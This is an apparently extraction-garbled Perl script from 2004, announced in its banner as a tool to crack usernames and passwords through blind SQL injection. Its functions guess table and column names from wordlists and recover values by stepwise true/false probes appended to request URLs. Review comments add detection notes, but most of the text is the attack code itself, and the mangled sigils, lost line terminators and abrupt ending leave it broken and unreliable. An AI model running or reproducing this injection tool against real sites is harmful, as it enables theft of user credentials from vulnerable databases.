Note: in the code below the `$` sigil is printed as `#` (in some places `∮`); read those characters as `$`.
#! /Usr/local/ActivePerl-5.8/bin/perl-w
Use IO: Socket;
Use threads;
# Function list;
# gethost: split the global url into host, path and (optional) port.
# Takes no arguments; it reads the global url and writes the globals
# host, path and port. Nothing is returned explicitly.
# NOTE(review): this listing is extraction-garbled -- the `$` sigil is printed
# as `#` or `∮`, so lines such as "# Host = #2;" are assignments, not comments.
Sub gethost
{
# Optional "http://" prefix, then the host up to the first "/", then the rest.
If (# url = ~ /(Http ://)? (. + ?) /(. + )/)
{
# Capture 2 is the host part; capture 3 is re-prefixed with "/" to form the path.
# Host = #2;
# Path =/. #3;
# A "host:port" form overrides the port (initialised to 80 further down the file).
If (# host = ~ /(.*):(.*)/)
{
# Host = #1;
# Port = #2;
}
}
}
# fieInput: test candidate column names, read from a wordlist file, against
# the target and report the first one the server accepts.
# Argument: the path of a file holding one candidate name per line.
# Returns the first candidate whose response contained the Info marker
# (undefined when none matched).
# Detection note: every probe appends
# "%20AND%20exists%20(select%20<name>%20from%20<table>)" to the request path,
# so the attempts appear verbatim in web-server access logs and can be matched
# by WAF/IDS rules. The probe only yields an answer where the application
# concatenates the request parameter into its SQL text; bound (parameterised)
# queries remove the true/false oracle it depends on.
Sub fieInput
{
My # field;
# Two-argument open on a bareword handle; the file name is used as given.
Open (fieInput, "_ # [0]") or die "cant open file! ";
# chomp's return value is the loop condition, so the loop stops when nothing
# was removed (end of file, or a last line without a trailing newline).
While (chomp (my ∮ input = <fieInput> ))
{
# table_user is not set in this sub; presumably a global assigned elsewhere -- confirm.
My # SQL = "exists % 20 (select % #20 input % 20 from % 20 # table_user )";
# Path1 is a global that connect appends to path when it builds the request line.
# Path1 = "% 20AND % 20 # SQL ";
My @ res = & connect;
# The Info marker (text supplied on the command line or at the prompt) appearing
# in the response is treated as "condition was true".
If ("@ res" = ~ /∮ Info /)
{
# Field = # input;
Print "+ -- # field -- + ";
Last;
}
}
Close (fieInput );
Return # field;
}
# tabInput: test candidate table names, read from a wordlist file, against
# the target and report the first one the server accepts.
# Argument: the path of a file holding one candidate name per line.
# Returns the first candidate whose response contained the Info marker
# (undefined when none matched).
# Detection note: every probe appends
# "%20AND%200<>(select%20count(*)%20from%20<name>)" to the request path; a run
# of requests that differ only in the name after "from" is the log pattern to
# alert on. As with any probe of this kind, it depends on the application
# building SQL by string concatenation.
Sub tabInput
{
My # table;
# Two-argument open on a bareword handle; the file name is used as given.
Open (tabInput, "∮ _ [0]") or die "cant open file! ";
# chomp's return value is the loop condition, so the loop stops when nothing
# was removed (end of file, or a last line without a trailing newline).
While (chomp (my ∮ input = <tabInput> ))
{
# The condition is true only when the named table exists and can be counted.
My # SQL = "0 <> (select % 20 count (*) % 20 from % 20 # input )";
# Path1 is a global that connect appends to path when it builds the request line.
# Path1 = "% 20AND % 20 # SQL ";
My @ res = & connect;
# Presence of the Info marker in the response is treated as "condition was true".
If ("@ res" = ~ /∮ Info /)
{
# Table = # input;
Print "+ -- # table -- + ";
Last;
}
}
Close (tabInput );
Return # table;
}
# connect: send one HTTP request for the globals path + path1 and return
# the server's response.
# Takes no arguments; reads the globals host, port, path and path1.
# Returns the response as a list of lines.
# Detection note: the request is a bare HTTP/1.0 GET whose Referer equals the
# Host value, with an empty Cookie header and no User-Agent header -- a
# combination ordinary browsers do not produce, so it is a usable log
# fingerprint alongside the "%20AND%20" suffix on the path.
# NOTE(review): the header strings show no line terminators; they were
# presumably lost in extraction -- confirm against an original copy.
Sub connect
{
# Req = "GET # path # path1 HTTP/1.0 ".
"Host: # host ".
"Referer: # host ".
"Cookie :";
# Open a TCP connection to host:port; the failure branch dies with a message.
My # connection = IO: Socket: INET-> new (Proto => "tcp ",
PeerAddr => # host,
PeerPort => ∮ port) │ die "Sorry! Cocould not connect to ∮ host ";
# Write the request, then read the whole response in list context.
Print # connection # req;
My @ res = <# connection>;
Close # connection;
Return @ res;
}
# crack: recover the numeric value of an SQL expression through repeated
# true/false probes.
# Arguments: a list of step sizes followed by the SQL expression as the last
# element (it is popped off the list before the loop).
# Returns the accumulated guess.
# Detection note: one request is sent per step size, each carrying
# "%20AND%20<number><(<sql>)" on the path. A burst of near-identical requests
# from one client that differ only in that number is the pattern to alert or
# rate-limit on.
Sub crack
{
My (@ dic) = @_;
My # SQL = pop (@ dic );
# I counts the steps taken; op is the sign applied to the next step.
My # I = 0;
My # op = 1;
My # crack;
Foreach my # pass (@ dic)
{
Print "> ";
# I ++;
# Move the guess by the current step in the direction chosen last time round.
# Crack + = # op * # pass;
# Path1 = "% 20AND % 20 # crack <(# SQL )";
My @ res = & connect;
# Marker present means "guess < value": keep adding. Otherwise subtract next.
If ("@ res" = ~ /∮ Info /)
{
# Op = 1;
# NOTE(review): as printed this is a single "=" (assignment), not a comparison;
# it may be extraction loss -- confirm. The apparent intent is "on the last step".
If (# I = @ dic)
{
# Crack ++;
}
}
Else
{
# Op =-1;
}
}
Return # crack;
}
# asc: turn a numeric character code into the corresponding byte string.
# Argument: the numeric code.
# Returns the packed string.
# NOTE(review): codes below 256 become a single byte; any other value is
# negated and handled as hex digits, which suggests the caller passes negative
# codes for multi-byte characters -- confirm against the call sites.
Sub asc
{
My # asc = # _ [0];
My # str;
If (# asc <256)
{
# Pack template and argument are garbled here (quotes and sigil lost in extraction).
# Str = pack (C *, asc );
}
Else
{
# Flip the sign, then render the value as upper-case hex.
# Asc * =-1;
# Str = sprintf ("% X", # asc );
# Keeps a four-hex-digit group; the pattern's tail is garbled, presumably an
# end anchor plus a case-insensitive flag -- confirm.
If (# str = ~ /(. {4}) # I)
{
# Str = #1;
}
# Convert the hex digits back into raw bytes.
# Str = pack ("H *", # str );
}
Return # str;
}
# Initialize variables;
# Url =;
# Host =;
# Path =;
# Info =;
# Port = 80;
@ Dic1 = (, 64 );
@ Dic2 = (16, 8, 4, 2, 1 );
@ Dic3 = (64, 32, 16, 8, 4, 2, 1 );
@ Dic4 = (16384,8192, 4096,2048, 1024,512,256,128, 64,32, 16,8, 1 );
Print "";
Print "* The script Crack user & pass for SQL-injection system *";
Print "* hemon @ East China Jiaotong Univercity, 2004.5 *";
Print "* E-mail: thedomainone @ yahoo.com.cn QQ: 24303484 *";
# Obtain the host address and path;
# ARGC = @ ARGV;
#Url = #argv [0];
# Info = # ARGV [1];
If (# ARGC! = 2)
{
Print "* Please input the url :*";
Chomp (# url = <STDIN> );
Print "* Please input the infomation :*";
Chomp (# info = <STDIN> );
}
& Gethost;
Print "started at # hos